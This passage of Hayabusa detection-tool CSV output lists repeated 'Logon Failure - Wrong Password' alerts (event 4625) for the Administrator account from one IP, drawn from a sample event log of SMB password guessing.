NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JpzKsyxEKNLd8l1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r0vd6xEFevamX3jF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WR9gJBoN1ra4NI2M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rGYNVrDBIpMBu9GT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 57qCysbeaXx12CbY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyJl4mHvgtTv53d9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGBDZCtot2ogcKIO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bBhmbqZIi1gX62mM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o7d4bcBJV1jlRgdt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtfFb6hMHJiFXxai | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: frlsZMDcdb5WaW99 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CFV8UiUTRCCfab9l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZI8P6ZeVRmQlbGtz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UmJI7S1nj5hfWZqv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: veh8XInSzXe8E9UD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a1BuBHLILZ4afwJC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NN2h7CHnGSCQZXan | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BU3fxfM1qGBJ55HS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1OlBmhUABabDQbN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6DgQtHG7cT05kRXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUTe3JqVWgDcDcOS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nGKgUOyX3USQlESB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rcIJ8keQvgax1SuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A7jsyA7bWtVf4sLr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mijnM28fwbgWzkvp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6dNmJo7vkacqxA6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FxvD2OWtadDT1Q2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WK8Esc50KVWIsLU5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U07NeCzXSdx5Nlgs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tObVl72GJse2HCGp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nbEnp2E5a3N78OBC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IlRmyinJLWwj5yQg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 92H7tdXinUOxtOLV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Za42EUNuitIXaMBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kz7OtswOreS0fdeS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VMxY1IHx5VuvskM7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d6uxMqLCcqHkuesV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TmeAWYvFEbqJp1rt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8tGAdT1CBRYRatVA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0h9ulMPWtj8bEKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eLyLMNv6cOp3sgrq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIAOs16X8nFxV45x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z4EbyEaUxUEyuiY6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SDnW5GABBLbe6eZ7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GublgQLD3RXQNmkX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BQRppHTUHAoWPe4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gnh6HFlIW1zWEBu5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ulbcy5PWLYUm5Sy0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L8rkZ7iBMam5o8VJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n39Zox0PFeNirzyT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3u3YUCKxEo5pnKJX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wen3pHM88kSRkHNf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dGDHJ4KMm2zEMV0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lKZAB1nfXPYSLxsE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tYkOsX0XDpkdvp01 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r9y7HjOeGPcrdj1c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RLwh8Lg3nvbm8Q2p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QoMkBcp8ouIgpX4m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2UnrDiOAOec5DQGQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UxJGLShj5EDKLSDZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iWhaz8W0VLQdXKWN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 82YDxSIBnCAqdK4c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 795b7XqsxokIGJyM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1BmnyTsmP2XqMzf1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NB3xsYe3RcPXhDib | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxN9i8exdO2h4oa7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vjcQaeuo4f8wFXhv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zCzr77BhliB4KKeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z558005RepKaO1zZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HFzW25mJz4JLkv7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y7J8m97GQWt2cbSs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJrVwcpABBaZ8cyY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VcDw3I4BaFLdIeCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: egEpV9aAuCFjwx2I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: th0ZLWF4YeOaNnkK | IP Addr: 192.168.198.149 | AuthPackage: 